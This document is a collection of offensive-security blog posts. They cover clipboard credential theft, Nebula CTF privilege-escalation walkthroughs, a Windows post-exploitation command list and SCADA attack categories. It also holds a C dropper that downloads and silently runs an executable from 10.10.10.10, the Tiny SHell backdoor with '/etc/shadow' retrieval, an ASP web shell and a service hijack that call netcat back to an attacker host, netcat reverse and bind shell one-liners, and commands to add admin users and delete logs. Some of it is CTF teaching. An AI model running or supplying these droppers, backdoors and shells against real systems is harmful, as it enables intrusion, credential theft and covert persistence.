Stealing Secrets (like Passwords) from Windows 10 with a vanilla shell

Today’s post was going to be about reverse shells with .vcf files. What I had in mind (lolbin shells) did not work because of filtering/search, but I will try some workarounds. In the meantime, check out this post on a variant that exploits .vcf with an msfvenom payload: Exploiting Windows PC using Malicious Contact VCF file (www.hackingarticles.in).

Since what I had in mind did not work (was fun lab testing at least), today’s post is short and sweet…

So, you got that vanilla shell (see Day 24: Windows Post Exploitation Shells and File Transfer with Netcat for Windows, medium.com)…

Now what? Dump the clipboard: whatever the user last copied, including passwords pasted from a password manager. Just one of many things you can do…

powershell.exe Get-Clipboard

That’s it, literally! Get-Clipboard ships with Windows PowerShell 5.0 and later (so Windows 10 out of the box) and only returns what is on the clipboard right now, so run it in a loop and log each change, along with screenshots of the desktop, and you will be left with a lot of juicy login creds.

Mac Clipboard Dump

pbpaste

Linux

As far as I know, all solutions are third-party installs; the way I usually dump it is from memory. Anyone have native command-line ways to dump the clipboard on any Linux OS?

Symlink for the Win!

Challenge Intro:

This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂

Let’s look at the source code…

Ok, so our file argument must NOT contain the string token, but we want to read token…

First thought is Symlink…let’s try…

Quick win, nice and easy 🙂

ln -s /home/flag04/token newfile
/home/flag04/flag04 newfile
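As an added example (not the level’s source, which is not reproduced above), here is the same bypass and the fix in shell: a stand-in for a check that refuses any argument containing "token", the symlink that walks around it, and a version that canonicalises the path with readlink -f before checking. The scratch directory, the token contents and the function names are constructed.

```bash
#!/bin/sh
# Added example, not the flag04 source: a stand-in for a "may not contain token"
# check, the symlink that bypasses it, and a check that resolves the path first.
# Scratch directory, token contents and function names are constructed.
WORK=$(mktemp -d)
printf 'secret-token-value\n' > "$WORK/token"

# Vulnerable: the filter looks at the argument *string*, not at what it opens.
read_guarded() {   # $1 = path requested by the caller
    case "$1" in
        *token*) echo "You may not access '$1'" >&2; return 1 ;;
    esac
    cat "$1"
}

# Fix: canonicalise first (readlink -f follows every symlink), then filter.
read_guarded_resolved() {
    real=$(readlink -f "$1") || return 1
    case "$real" in
        *token*) echo "You may not access '$1' ($real)" >&2; return 1 ;;
    esac
    cat "$real"
}

# The bypass from the write-up: "newfile" contains no "token", the link target does.
ln -s "$WORK/token" "$WORK/newfile"
```

Even the resolved check is still a name filter. The real fix is to decide on what the process may access rather than on what the string looks like: drop privileges before the open, or open the file and check ownership with fstat, because the same inode can be reachable under another name (a hard link, for instance) that never mentions token.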

Abusing Cron for Privilege Escalation (Nebula Level03)

Abusing Cron

The challenge provides a hint:

Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.

These types of issues are common in easy CTFs and CTF VMs. The issue is generally a command running as another user that can be abused in some way; on Linux the most common ones are wildcard expansion (an unquoted * handed to tar, chown and friends) and writable directories or scripts. Today we will focus on a cron job that globs a directory we can write to and executes whatever it finds there, which lets us do whatever we need to as the user the job runs as, in this case flag03.

Solution #1

In our bash script we will use chmod +s, which sets the set-user-ID and set-group-ID bits on execution: exactly what we want in order to spawn a shell as flag03.

First let’s create our exploit. We need to know the UID of the user we want to mimic; since it’s a CTF VM we know it’s flag03, so we can run the following command:

level03@nebula:/home/flag03$ cat /etc/passwd | grep "flag03"
flag03:x:996:996::/home/flag03:/bin/sh

Ok, so UID and GID 996; the shell.c wrapper, which sets its user and group ID to 996 and execs a shell, should look like this…

shell.c

Now let’s create the ‘glue’: the script the cron job will run as flag03, which copies our compiled shell, sets the SUID/SGID bits and makes it executable…

pwn.sh

Commands are run as follows:

nano /tmp/shell.c
cd /home/flag03/writeable.d/
nano pwn.sh
chmod +x pwn.sh
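Added example (constructed; neither Nebula’s cron script nor the post’s pwn.sh, which are not reproduced above): a stand-in for a cron job that globs a writable directory and executes each file, plus the payload that drops a setuid copy of a binary. It runs as the current user in a scratch directory, so the bits land on a file you already own; on the VM the same payload, executed by flag03’s cron job, leaves a flag03-owned setuid binary behind.

```bash
#!/bin/sh
# Added example (constructed; not Nebula's writable.sh or the post's pwn.sh):
# a stand-in for a cron job that runs every file in a world-writable directory,
# plus the payload you drop there. Everything stays in a scratch directory and
# runs as the current user.
WORK=$(mktemp -d)
mkdir -p "$WORK/writable.d"

# Stand-in for the privileged cron job: glob the directory, run and delete each script.
cron_job() {
    for i in "$WORK/writable.d"/*; do
        [ -e "$i" ] || continue          # unmatched glob stays literal; skip it
        sh "$i"
        rm -f "$i"
    done
}

# The payload the attacker drops: copy a binary, keep it owned by the job's user
# (whoever cron runs this as) and set the setuid/setgid bits. cp of /bin/sh only
# stands in for the compiled shell.c wrapper here; see the note below.
drop_payload() {
    cat > "$WORK/writable.d/pwn.sh" <<EOF
cp /bin/sh "$WORK/shell"
chmod +s "$WORK/shell"
chmod +x "$WORK/shell"
EOF
}

exploit() {   # returns 0 when the job consumed the payload and left a setuid binary
    drop_payload
    cron_job
    [ -u "$WORK/shell" ] && [ ! -e "$WORK/writable.d/pwn.sh" ]
}
```

The payload copies /bin/sh only to keep the example self-contained: bash resets its effective UID to the real UID on startup unless invoked with -p, so a plain setuid copy of bash would hand you nothing. That is why the post compiles a shell.c that calls setresuid()/setresgid() with 996 and then execs the shell.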

I have some great cron priv. esc. examples in the archives from old jobs/CTFs; when I get a chance I will update this post on all things cron-based priv. esc.

Set User ID & Environment Variable Injection (PATH & USER) for Linux Priv. Esc.

To follow along, get the Nebula VM from Exploit Education (exploit.education), which provides a variety of resources for learning vulnerability analysis and exploitation.

Level 00 (Set User ID)

Finding the files and ignoring errors…

find / -perm /4000 2>/dev/null

A lot of these are common Linux files that are set-user-ID, so over time you get to know them and ignore them, unless you’re in a CTF that is trolling you and the issue is in a common binary; so always check anyway if you hit a dead end, or if it’s an old version with known vulnerabilities.

Of course “/bin/…/flag00” is seriously suspect, so we try this…

level00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account

It really was that easy, but do not underestimate the power of set-user-ID: it has allowed me to priv. esc. more times than I can recall. It’s powerful, it’s common, use it! Always check permissions!

Search for SUID/SGID binaries

find / -maxdepth 6 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
find / -perm -1000 -type d 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

The parentheses matter: without them -o splits the expression so that ! -type l and -exec only apply to the -perm -4000 branch, and the SGID half falls back to a plain -print. The second line lists sticky-bit directories (world-writable-by-design places such as /tmp), the third SGID files only.
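Added example, not from the post: a small filter over the find output that hides the setuid/setgid names you expect on a stock install, so only the odd ones (like a binary under /bin/...) are left to look at. The scratch tree, the baseline list and the file names are constructed; on a real target point it at / and grow the baseline as you learn what is normal there.

```bash
#!/bin/sh
# Added example (not from the original post): list setuid/setgid files under a
# root and drop the names expected on a stock install, leaving the oddities.
# Runs on a constructed scratch tree here; point ROOT at / on a real box.
WORK=$(mktemp -d)
mkdir -p "$WORK/bin/..." "$WORK/usr/bin"
for f in "$WORK/usr/bin/passwd" "$WORK/usr/bin/sudo" "$WORK/bin/.../flag00"; do
    printf '#!/bin/sh\n' > "$f"
done
chmod 4755 "$WORK/usr/bin/passwd" "$WORK/usr/bin/sudo" "$WORK/bin/.../flag00"

# Constructed baseline of basenames that are setuid/setgid on most distributions;
# not exhaustive, extend it per target.
BASELINE='passwd sudo su mount umount chsh chfn newgrp gpasswd'

# Setuid OR setgid regular files; parenthesised so -o does not swallow ! -type l.
list_suid_sgid() {   # $1 = root to search
    find "$1" \( -perm -4000 -o -perm -2000 \) ! -type l -type f 2>/dev/null
}

# Print only entries whose basename is not in the baseline.
suspicious_suid() {  # $1 = root to search
    list_suid_sgid "$1" | while IFS= read -r path; do
        name=$(basename "$path")
        case " $BASELINE " in
            *" $name "*) ;;                  # known on a stock install, skip
            *) printf '%s\n' "$path" ;;
        esac
    done
}
```

Matching on basename alone is deliberate: a SUID binary named passwd that lives somewhere other than /usr/bin would slip through this filter, so diff the full paths against a known-good host too when you can.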

Nebula Level00 (asciinema recording by int0x33, asciinema.org)

Level 01 (Environment Variable Injection — PATH)

Challenge source is provided, can we spot the vulnerability?

We know we can alter environment variables and that the program will do the following:

setresuid(), which sets the real user ID, the effective user ID and the saved set-user-ID of the calling process, and setresgid(), which does the same for the real, effective and saved group IDs, before running an external command.

With the source code and access to the server, it’s easy to spot the issue; the binary is setuid flag01:

-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01

If we can change $PATH so that /tmp, a place we know we can write to, is searched first, then we can put our own ‘echo’ binary there, and the program will run it as flag01. Our echo program will simply spawn a new shell.

nano /tmp/echo.c
cc /tmp/echo.c -o /tmp/echo
export PATH=/tmp/:$PATH
cd /home/flag01
./flag01
getflag

Nebula – Level01 (asciinema recording by int0x33, asciinema.org)

Level 02 (Environment Variable Injection — USER)

We get the source again for this..

This one is easy, we can just inject a command into the USER environment variable (export it, in case USER is not already exported in your session):

cd /home/flag02
export USER=";/bin/sh;"
./flag02
getflag

The two semicolons around /bin/sh are important: the program builds the string "echo <USER> is cool" and hands it to a shell, so without them it would just run echo /bin/sh is cool, which prints a line and does nothing for us. With them, the shell sees echo, then /bin/sh as its own command, then is cool.

Nebula – level 02 (asciinema recording by int0x33, asciinema.org)
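Added example covering both Level 01 and Level 02 (constructed, not the Nebula sources): the two environment injections re-created in shell. Level01’s binary runs echo through env, so PATH decides which echo executes; Level02 pastes $USER into a command string that a shell then parses. Each vulnerable call is paired with its fix. The scratch directory, the fake echo, the marker-file payload and the function names are all assumptions.

```bash
#!/bin/sh
# Added example (constructed; not the Nebula sources): PATH lookup hijack and
# command injection through an environment variable, each beside its fix.
# Runs entirely in a scratch directory as the current user.
WORK=$(mktemp -d)
mkdir -p "$WORK/bin"

# --- Level01: PATH lookup -------------------------------------------------
# Stand-in for the SUID program's system("/usr/bin/env echo ...") call:
# env resolves "echo" through PATH, so whoever controls PATH picks the binary.
vuln_path_echo() { env echo 'and now what?'; }
# Fix: an absolute path makes PATH irrelevant (and drop privileges before system()).
safe_path_echo() { /bin/echo 'and now what?'; }

# The attacker's "echo": a real exploit execs /bin/sh here and inherits the SUID
# owner's uid; this one only announces itself so the result is testable.
cat > "$WORK/bin/echo" <<'EOF'
#!/bin/sh
printf 'HIJACKED\n'
EOF
chmod +x "$WORK/bin/echo"

with_poisoned_path() {   # run a function with the writable dir first on PATH
    ( PATH="$WORK/bin:$PATH"; export PATH; "$@" )
}

# --- Level02: USER in a command string -----------------------------------
# Stand-in for asprintf(&buf, "/bin/echo %s is cool", getenv("USER")); system(buf);
vuln_user_echo() {       # $1 plays the role of $USER
    cmd="/bin/echo $1 is cool"
    sh -c "$cmd"         # the value is parsed as shell syntax: ; | $( ) all work
}
# Fix: pass the value as an argument, never through a shell parser.
safe_user_echo() {
    /bin/echo "$1" is cool
}
```

The same two bugs show up outside CTFs whenever a privileged program calls system() or popen(): system() always goes through /bin/sh, so either the command string is fully under your control (absolute paths, no user input spliced in) or you use execve() with an argument vector.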

Part 1 — Billy Gates (Writing Remote Admin Apps for Windows in C)

Ever wanted a stealthy *Admin App 😉 that can hide itself? Restore itself? Update itself? Communicate without Eavesdroppers? Has anti debugging techniques? and can bypass common AV? Yea, me too. So we will build one in C, because C is also good to learn for pentesting, reversing, CTFs and much more. I am an experienced programmer but C is my weakest language so if I make n00b mistakes please tell me and help me out a little ❤

Dropper.c

I have had this code for years, it has served me well and was originally taken from a book called Advanced Persistent Threat Hacking, which was quite good from what I remember.

What it does…

Housekeeping, like imports and definitions…

#define PTL "https"
#define DMN "10.10.10.10"
#define FLE "sHELL.exe"
#define CURL_STATICLIB
#include <windows.h>   /* WinExec */
#include <stdio.h>
#include <string.h>
#include <curl/curl.h>

#include <file>

This variant is used for system header files. It searches for a file named file in a standard list of system directories.

#include "file"

This variant is used for header files of your own program. It searches for a file named file first in the directory containing the current file, then in the quote directories and then the same directories used for <file>.

Callback Function

We need to give curl a callback function, this is standard and defined in example docs like this: https://curl.haxx.se/libcurl/c/getinmemory.html

Ours is simple: it casts the user pointer back to the open FILE handle and writes the buffer to it…

size_t write_callback(void *buffer, size_t size, size_t nitems, void *userp)
{
    FILE *file = (FILE *)userp;                       /* CURLOPT_WRITEDATA */
    size_t written = fwrite(buffer, size, nitems, file);
    return written;    /* returning fewer than nitems makes curl abort the transfer */
}

Main

Here we declare our handles, then build the URL we will request from PTL (protocol), DMN (domain) and FLE (file), giving https://10.10.10.10/sHELL.exe.

Then we use curl to fetch the file through our callback, clean up (the curl handle, then the file handle so the download is flushed to disk) and, only if the transfer succeeded, execute the downloaded file. One caveat: libcurl verifies the TLS certificate by default, so an https URL to a bare IP with a self-signed certificate will fail unless the host trusts the server’s certificate (or you turn verification off with CURLOPT_SSL_VERIFYPEER, which is the kind of thing detections look for).

int main(void)
{
    CURL *curl;
    CURLcode res = CURLE_FAILED_INIT;
    FILE *outFile;
    char finalURL[512];

    /* Build https://10.10.10.10/sHELL.exe from the three defines; snprintf bounds
       the write, so no memset/strcat chain (the original memset had its arguments
       swapped and zeroed nothing) */
    snprintf(finalURL, sizeof(finalURL), "%s://%s/%s", PTL, DMN, FLE);

    outFile = fopen(FLE, "wb");
    if (outFile == NULL)
        return 1;

    curl_global_init(CURL_GLOBAL_DEFAULT);
    curl = curl_easy_init();
    if (curl) {
        curl_easy_setopt(curl, CURLOPT_URL, finalURL);
        curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
        curl_easy_setopt(curl, CURLOPT_WRITEDATA, outFile);
        res = curl_easy_perform(curl);
        curl_easy_cleanup(curl);
    }
    curl_global_cleanup();
    fclose(outFile);           /* flush to disk before anything tries to run it */

    if (res != CURLE_OK)
        return 1;              /* empty or partial download: do not execute it */

    WinExec(FLE, SW_HIDE);     /* SW_HIDE (0): run the payload without a window */
    return 0;
}

This code is basic and could be improved a lot; some parts are also quite dated and very easy to detect, so we will work on improving them in future BillyGates posts. Over time we will develop BillyGates into an effective, hard-to-detect remote admin app for Windows. Repo: int0x33/BillyGates on GitHub (github.com).

Tiny SHell (SSH-like backdoor with full-pty terminal)

Note: Why am I posting this? Because today I forked it and will add features plus allow recursive file transfer, also some sneaky evasion stuff too. So I am posting this to give you all a background to the tool and also so you can star it on Github for updates if you want to get early releases.

Tsh is a small ssh-like backdoor with a full-pty terminal and file transfer capability. It has a very small footprint and is easily built on most Unix-like systems. Repo: int0x33/tsh on GitHub (github.com).

Before compiling Tiny SHell

  • First of all, you should setup your secret key, which is located in tsh.h; the key can be of any length (use at least 12 characters for better security).
  • It is advised to change SERVER_PORT, the port on which the server will be listening for incoming connections.
  • You may want to start tshd in “connect-back” mode if it runs on a firewalled box; simply uncomment and modify CONNECT_BACK_HOST in tsh.h.

Compiling Tiny SHell

Run “make <system>”, where <system> can be any one of these: linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf

How to use the server

It can be useful to set $HOME and the file creation mask before starting the server:

% umask 077; HOME=/var/tmp ./tshd 

How to use the client

Make sure tshd is running on the remote host.

Start a shell:

./tsh <hostname>

Execute a command:

./tsh <hostname> "uname -a"

Transfer files:

./tsh <hostname> get /etc/shadow 
./tsh <hostname> put vmlinuz /boot

Multiple file transfers

At the moment, Tiny SHell does not support scp-like multiple and/or recursive file transfers. You can work around this bug by simply making a tar archive and transferring it.

./tsh host "stty raw; tar -cf - /etc 2>/dev/null" | tar -xvf -

On some brain-dead systems (actually, IRIX and HP-UX), Ctrl-C and other control keys do not work correctly. Fix it with:

% stty intr "^C" erase "^H" eof "^D" susp "^Z" kill "^U"

Security

Please remember that the secret key is stored in clear inside both tsh and tshd executables; therefore you should make sure that no one except you has read access to these two files. However, you may choose not to store the real (valid) key in the client, which will then ask for a password when it starts.

The Complete List of Windows Post-Exploitation Commands (No Powershell)
  • I was very pushed for time today, I have a lot more to add so please keep checking as this will grow and grow! I will also try and organise this better and add my smart recon scripts. ❤

Current User

whoami /all

On older machines, whoami might not be available so to find out the current user try the following:

echo %username%

All Users

net user

Add User

net user hacker hack3d /add

Make User Admin

net localgroup administrators hacker /add

Remove User

net user hacker /del

Files

type %SYSTEMDRIVE%\boot.ini
type %WINDIR%\win.ini
type %WINDIR%\System32\drivers\etc\hosts

boot.ini only exists on XP/Server 2003; Vista and later keep the boot configuration in the BCD store (bcdedit /enum).

Files to Pull

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts

Host Information

systeminfo
driverquery
tasklist
fsutil fsinfo drives
set
qwinsta
net time
net file
net session
net use

If you are looking for kernel exploit targets, you can try using findstr like so…

driverquery | findstr Kernel

Services

sc queryex type= service state= all
netstat -ano

Query a specific service:

sc query <SERVICE NAME>

Start a service:

sc start <SERVICE NAME>

Stop a service:

sc stop <SERVICE NAME>

Kill a Task

taskkill /f /pid 1337

List Event Logs

wevtutil el

Delete Logs

del \*.log /a /s /q /f

This walks the whole drive from the root and deletes every .log it can reach, which is noisy, destructive and leaves obvious gaps; it also does not touch the Windows event logs, which are cleared per log with wevtutil cl <LOGNAME>.

Scheduled Tasks

schtasks /query /fo LIST /v

Installed Software

wmic product get name /value

Note that the Win32_Product class only covers MSI-installed software and that querying it makes Windows Installer run a consistency check on every package (it can even repair them), so it is slow and logs MsiInstaller events; the Uninstall keys under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall are the quieter source.

Uninstall Software

wmic product where name="<NAME>" call uninstall /INTERACTIVE:OFF

Search for Keywords (e.g *pass)

dir /s *pass* == *key* == *vnc* == *.config*

The above also looks for key, vnc and config.

Only in certain files…

findstr /si pass *.xml *.ini *.txt

Grep Registries…

reg query HKLM /f pass /t REG_SZ /s
reg query HKCU /f pass /t REG_SZ /s

WiFi Clear Text Passwords

Find AP SSID

netsh wlan show profile

Get Cleartext Pass

netsh wlan show profile <SSID> key=clear

Hacking like it’s 1999 (No Metasploit — Windows XP)

Enum & PWN

nmap -sC -sV -oN nmap <TARGET>

Turns out we can write to the webroot over FTP, so what do we do next?

ftp> put nc.exe
ftp> put callhome.asp

callhome.asp

Set objShell = Server.CreateObject("WScript.Shell")
objShell.Run("C:\www\nc.exe 10.10.10.10 6000 -e cmd")

Wrapped in <% %> tags, the two lines above use the netcat we uploaded via FTP to call home. Start a listener first (nc -lvnp 6000 on 10.10.10.10), then visit https://vulnerable.net/callhome.asp.

We Now Haz Shell

Now what? The Classics…

FuzzySecurity | Windows Privilege Escalation Fundamentals (www.fuzzysecurity.com)

In this case, by reconfiguring the service we can make it run any binary of our choosing with SYSTEM privileges.

I configured it to just call home again so I could manually enable RDP and create an admin user:

sc config upnphost binpath= "C:\www\nc.exe 10.10.10.10 6000 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

net start will report that the service failed to respond (nc is not a real service binary and never answers the service control manager), but by then the callback has already fired, so check the listener rather than the error.

Enable RDP and Add User

net user hacker hacked /add
net localgroup administrators hacker /add
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Profit and Win like it’s 1999

rdesktop -u hacker -p hacked <TARGET> -g 90%

Windows Post Exploitation Shells and File Transfer with Netcat for Windows

The Problem

We know the situation all too well: we have remote code execution and can upload and/or write files through a temperamental connection, but want something a little more robust, something like netcat, which always comes in so handy when pwning Unix systems.

The Solution — Netcat for Windows

Both the 32-bit (nc.exe) and 64-bit (nc64.exe) builds are in the int0x33/nc.exe repo on GitHub (github.com).

Uploading Files

A good tip that often comes in handy is to base64 encode a file, then simply copy the base64 blob to a file via a vuln or RCE and either decode first or after depending on your RCE situation. If you try and copy a file as-is in many situations the troublesome contents like language operators or null bytes etc will break the connection, application or worse, crash the target host.
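Added example, not from the post: the encode, chunk and decode round trip in shell. It emits one cmd.exe echo >> command per chunk so each can be pushed through an RCE parameter, then simulates the target side locally (the decode that certutil -decode nc.b64 nc.exe does on Windows) to prove the bytes survive. The binary is a constructed random blob and the chunk size is an assumption.

```bash
#!/bin/sh
# Added example (not from the original post): staging a binary through an RCE
# channel that only carries printable text. Encode on the attacker side, split
# into command-sized chunks, decode on the target. The target side is simulated
# here; on Windows the reassembled file is decoded with: certutil -decode nc.b64 nc.exe
WORK=$(mktemp -d)
head -c 3001 /dev/urandom > "$WORK/nc.exe"   # constructed stand-in for the real binary
CHUNK=1000   # assumption: base64 chars per command; cmd.exe lines max out at 8191
             # and URL-encoding grows + / = to three chars each, so stay well under

# Single-line base64: only [A-Za-z0-9+/=], so no shell operators, quotes or NULs
# can break the injection point or the application.
encode_for_transfer() {
    base64 "$1" | tr -d '\n'
}

# One cmd.exe command per chunk, appending to a staging file on the target.
chunk_commands() {     # $1 = local file to stage, $2 = destination path on target
    { encode_for_transfer "$1"; echo; } | fold -w "$CHUNK" | while IFS= read -r chunk; do
        printf 'echo %s>>%s\n' "$chunk" "$2"
    done
}

# Simulated target: pull the chunks back out of the generated commands in order,
# join them and decode (stand-in for certutil -decode).
replay_and_decode() {  # $1 = file holding the chunk commands, $2 = output path
    sed -n 's/^echo \(.*\)>>.*$/\1/p' "$1" | tr -d '\n' | base64 -d > "$2"
}

stage_and_verify() {   # returns 0 when the reassembled file is byte-identical
    chunk_commands "$WORK/nc.exe" '%TEMP%\nc.b64' > "$WORK/commands.txt"
    replay_and_decode "$WORK/commands.txt" "$WORK/nc.decoded"
    cmp -s "$WORK/nc.exe" "$WORK/nc.decoded"
}
```

Order matters: each command appends, so if the RCE is fired from a script keep it sequential and compare a hash of the decoded file on the target (certutil -hashfile nc.exe SHA256) against the original before you run it.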

Reverse Powershell

#32bit
nc.exe $ATTACKER_HOST $ATTACKER_PORT -e powershell
#64bit
nc64.exe $ATTACKER_HOST $ATTACKER_PORT -e powershell

Example RCE on web app:

https://vulnerable.com?pageId=nc64.exe 10.10.10.10 1337 -e powershell

Of course in the wild, we would url encode it:

https://vulnerable.com?pageId=nc64.exe%2010.10.10.10%201337%20-e%20powershell

Bind Powershell

#32bit
nc.exe -l -p $LISTENPORT -e powershell
#64bit
nc64.exe -l -p $LISTENPORT -e powershell

Reverse Shell

#32bit
nc.exe $ATTACKER_HOST $ATTACKER_PORT -e cmd
#64bit
nc64.exe $ATTACKER_HOST $ATTACKER_PORT -e cmd

Bind Shell

#32bit
nc.exe -l -p $LISTENPORT -e cmd
#64bit
nc64.exe -l -p $LISTENPORT -e cmd

Transfer File

Start the receiver first so the sender has something to connect to; some netcat builds keep the connection open after the sender hits EOF, so Ctrl-C the listener once the file stops growing.

Sender (Unix)

nc $TARGET $PORT < $FILE

Receiver (Windows)

#32bit
nc.exe -l -p $LISTENPORT > $FILE
#64bit
nc64.exe -l -p $LISTENPORT > $FILE

Common SCADA Attacks

Network Attacks

  • Service & Application Vulnerabilities
  • Brute-force Attacks (Logins and Hashes)
  • Pass-the-hash
  • Sniffing cleartext password exchanges
  • MITM
  • Denial of Service incl. Distributed Attacks
  • Packet Injection
  • Route Spoofing
  • DNS Poisoning
  • Session Hijacking
  • VLAN hopping
  • Spanning Tree Attacks
  • VLAN Trunking Attacks

Web Attacks

  • Source code modification
  • Plugin & Extension Attacks
  • Remote and Local File Inclusion
  • XSS
  • SQLi
  • CSRF
  • Browser Attacks

Workstations and Servers

  • Device driver attacks
  • Cold Boot Attacks
  • Password & hash extraction/cracking
  • Sinkhole Attacks

Binary and Application Attacks

  • Buffer & Stack Overflows
  • Format String Exploits
  • Input Validation Attacks
  • Use-After-Free
  • Integer Overflow/Underflow
  • Dangling Pointer Attacks
  • Off by one attacks
  • Return-to-* attacks (ret2libc and similar)

User Attacks

  • Spear Phishing & Phishing
  • Social Engineering

We will be digging into a lot of these topics over the coming weeks, so if you are unfamiliar with a few of them don’t worry, try googling in the meantime. My favourites are binary/application and network attacks. To learn more about the basics of these kinds of attacks on SCADA systems, I recommend the following book to get you started: Hacking Exposed Industrial Control Systems: ICS and SCADA Security Secrets & Solutions (www.amazon.com).